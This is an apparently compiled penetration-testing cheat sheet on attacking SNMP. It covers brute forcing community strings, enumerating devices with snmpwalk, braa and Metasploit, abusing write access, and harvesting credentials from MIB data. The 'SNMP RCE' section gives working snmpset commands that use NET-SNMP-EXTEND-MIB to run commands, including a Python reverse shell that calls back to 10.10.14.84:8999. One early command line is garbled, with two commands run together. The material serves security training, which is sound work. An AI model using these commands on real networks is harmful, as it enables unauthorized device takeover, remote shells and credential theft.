SNMP (Simple Network Management Protocol) is a protocol that allows you to monitor the status of devices on a computer network. It can be network equipment, IP phones, corporate servers or anything else.
SNMP uses the UDP transport layer protocol with port numbers 161/UDP and 162/UDP. So-called community strings are used to refer SNMP agents to the server. These are, shall we say, special passwords for communicating with the SNMP server. Community strings have either RO (read-only) or RW (read-write) permissions.
Actually, SNMP can not only monitor the equipment status, but also manage it in full: dump configs, change the configuration, etc. If a pentester can look up the value of community strings, he actually gains access to the equipment. However, it all depends on which string he bruteforced— to RO or RW community string.
Bruteforce community strings can be implemented using the onesixtyone utility. It will take as input the dictionary for bruteforcing and the IP addresses of the target hosts. The targets will be:
- 10.10.100.10 — Cisco vIOS Switch
- 10.10.100.254 — Cisco vIOS Router
~$ onesixtyone -c communitystrings -i targetsonesixtyone -c /usr/share/doc/onesixtyone/dict.txt $IP
We found out what community strings are used on those devices. This opens the way for us to exploititation.
Because SNMP produces such a wealth of information about target devices, it is an excellent tool for reconnaissance and enumeration. An SNMP manager (also known as a network management system, or NMS) is an application that runs continuously on the network. On a regular interval (usually every 5 to 15 minutes), it queries devices for their status. These devices are typically servers, routers, switches, wireless access points, hubs, and other devices capable of running the SNMP service. The SNMP service has an agent that listens for incoming manager queries. The manager must identify itself to the agent by its community string, which is a text identifier that must be the same on both the manager and the device. If the manager uses a different community string, the device will ignore it. The default community string for all SNMP installations is either public or private, but can easily be changed. Most SNMP implementations are in cleartext, though version 3 uses encryption. Usually the NMS does the querying, but an agent can be configured to raise a trap (an alert) if some threshold is met. Traps can be set on any number of counters. Examples include low disk space, high CPU temperature, high CPU or RAM utilization, a congested interface, and security violations.
There are three basic categories of SNMP exploits:
- To sniff cleartext SNMP communications between managers and agents to obtain the community string or information from the devices. This can include statistics about hardware, interface traffic, services, users, groups, route tables, listening ports, running processes, and much more.
- To pose as an SNMP manager, providing the correct community string, and enumerate information from SNMP agents.
- To exploit the implicit trust SNMP managers have with the assets they manage. Most NMSs do not carefully validate the input from their agents. The attacker could passively or actively inject XSS data or other improperly formatted strings from the agent to the NMS. These could result in buffer overflows or arbitrary command injection.
Tools for SNMP Exploitation
Some common tools to exploit SNMP include:
- auxiliary/scanner/snmp/snmp_enum
- auxiliary/scanner/snmp/snmp_enumshares
- auxiliary/scanner/snmp/snmp_enumusers
- auxiliary/scanner/snmp/snmp_login
- exploit/multi/http/hp_sys_mgmt_exec
- exploit/windows/http/h_nnm_snmp
- snmp-brute.nse
- snmp-win32-software.nse
- snmp-win32-services.nse
nmap $IP -Pn -sU -p 161 --script=snmp-brute
nmap $IP -Pn -sU -p 161 --script=snmp-interfaces
snmpwalk -c {communityString} $IP
Metasploit has many SNMP-related scanners and exploits. You can search for modules by entering any of the following commands at the msfconsole:
search snmp
search scanner name:snmp
search exploit name:snmp -S great
Note: For more information about SNMP injection-based exploits, see https://information.rapid7.com/managed-to-mangled-snmp-exploits-for-network-management-systems.html
Enumerating SNMP
It is recommanded to install the following to see whats does mean each OID gathered from the device:
apt-get install snmp-mibs-downloader
download-mibs
# Finally comment the line saying "mibs :" in /etc/snmp/snmp.conf
sudo vi /etc/snmp/snmp.conf
If you know a valid community string, you can access the data using SNMPWalk or SNMP-Check:
snmpbulkwalk -c [COMM_STRING] -v [VERSION] [IP] . #Don't forget the final dot
snmpbulkwalk -c public -v2c 10.10.11.136 .
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP]
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] 1.3.6.1.2.1.4.34.1.3 #Get IPv6, needed dec2hex
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] NET-SNMP-EXTEND-MIB::nsExtendObjects #get extended
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] .1 #Enum all
snmp-check [DIR_IP] -p [PORT] -c [COMM_STRING]
nmap --script "snmp* and not snmp-brute" <target>
braa <community string>@<IP>:.1.3.6.* #Bruteforce specific OID
Thanks to extended queries (download-mibs), it is possible to enumerate even more about the system with the following command :
snmpwalk -v X -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull
SNMP has a lot of information about the host and things that you may find interesting are: Network interfaces (IPv4 and IPv6 address), Usernames, Uptime, Server/OS version, and processes running (may contain passwords)….
Dangerous Settings
From https://academy.hackthebox.com/module/112/section/1075
Settings | Description |
rwuser noauth | Provides access to the full OID tree without authentication. |
rwcommunity {communityString} {IPv4 address} | Provides access to the full OID tree regardless of where the requests were sent from. |
rwcommunity6 {communityString} {IPv6 address} | Same access as with rwcommunity with the difference of using IPv6. |
Check for ‘rw’ Authorization
#-v1 is snmp version
snmpwalk -c {communityString} $IP
lists
{sysName} = STRING: {oldValue}
#then
snmpset -c {communityString} {sysName} s {newValue}
snmpwalk -c {communityString} $IP
lists
{sysName} = STRING: {newValue}
SNMP RCE
This post was copied from https://rioasmara.com/2021/02/05/snmp-arbitary-command-execution-and-shell/
SNMP is sometimes overseen by the administrator of the device or server where it is left in a default configuration. SNMP community with write permissions (rwcommunity) on the Linux operating system can be abused to let the attacker execute a command on the server.
Extending the Services
While you are not able to modify existing entries that were configured in snmpd.conf, it is possible to add additional commands over SNMP, because the “MAX-ACCESS” permission setting in the MIB definition is set to “read-create”
Adding a new command basically works by appending an additional row to the “nsExtendObjects” table.
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c c0nfig localhost \
'nsExtendStatus."evilcommand"' = createAndGo \
'nsExtendCommand."evilcommand"' = /bin/echo \
'nsExtendArgs."evilcommand"' = 'hello world'
Injecting a command to run on the SNMP service. NET-SNMP-EXTEND-MIB requires that you always provide the absolute path to the executable. The called binary/script must also exist and be executable.
Executing the command that we injected to the SNMP by enumerating it using snmpwalk
snmpwalk -v2c -c SuP3RPrivCom90 10.129.2.26 NET-SNMP-EXTEND-MIB::nsExtendObjects
Showing that the command is /bin/echo.
The command will be executed when the it is read. run-on-read()
The command /bin/echo “hello rio is here” was executed during our snmpwalk read
Getting the Shell from Net-SNMP Extend
In this section, I would like to discuss how to gain a server shell to control the server.
You can use python script developed by mxrch that can be downloaded from https://github.com/mxrch/snmp-shell.git
You can install the pre-requisite to run this:
sudo apt install snmp snmp-mibs-downloader rlwrap -y
git clone https://github.com/mxrch/snmp-shell
cd snmp-shell
sudo python3 -m pip install -r requirements.txt
Creating reverse shell
You can also create reverse shell manually by injecting the command below into the SNMP
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.129.2.26 'nsExtendStatus."command10"' = createAndGo 'nsExtendCommand."command10"' = /usr/bin/python3.6 'nsExtendArgs."command10"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"10.10.14.84\",8999));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'
run the snmpwalk to trigger the command execution
Our netcat receives the reverseshell connection from the victim that allow us to gain control over the victim machine
Massive SNMP
Braa is a mass SNMP scanner. The intended usage of such a tool is, of course, making SNMP queries – but unlike snmpwalk from net-snmp, it is able to query dozens or hundreds of hosts simultaneously, and in a single process. Thus, it consumes very few system resources and does the scanning VERY fast.
Braa implements its OWN snmp stack, so it does NOT need any SNMP libraries like net-snmp.
Syntax: braa [Community-string]@[IP of SNMP server]:[iso id]
braa ignite123@192.168.1.125:.1.3.6.*
This can extract a lot MB of information that you cannot process manually.
So, lets look for the most interesting information (from https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/):
Devices
One of the first things I do is extract the sysDesc .1.3.6.1.2.1.1.1.0 MIB data from each file to determine what devices I have harvested information from. This can easily be done using the following grep command:
grep ".1.3.6.1.2.1.1.1.0" *.snmp
Identify private string
As an example, if I can identify the private community string used by an organization on their Cisco IOS routers, then I could possibly use that community string to extract the running configurations from those routers. The best method for finding such data has often been related to SNMP Trap data. So again, using the following grep we can parse through a lot of MIB data quickly searching for the key word of “trap”:
grep -i "trap" *.snmp
Usernames/passwords
Another area of interest is logs, I have discovered that there are some devices that hold logs within the MIB tables. These logs can also contain failed logon attempts. Think about the last time you logged into a device via Telnet or SSH and inadvertently entered your password as the username. I typically search for key words such as fail, failed or login and examine that data to see if there is anything of value.
grep -i "login\|fail" *.snmp
Emails
grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" *.snmp
Modifying SNMP values
You can use NetScanTools to modify values. You will need to know the private string in order to do so.
Spoofing
If there is an ACL that only allows some IPs to query the SMNP service, you can spoof one of this addresses inside the UDP packet an sniff the traffic.
Examine SNMP Configuration files
- snmp.conf
- snmpd.conf
- snmp-config.xml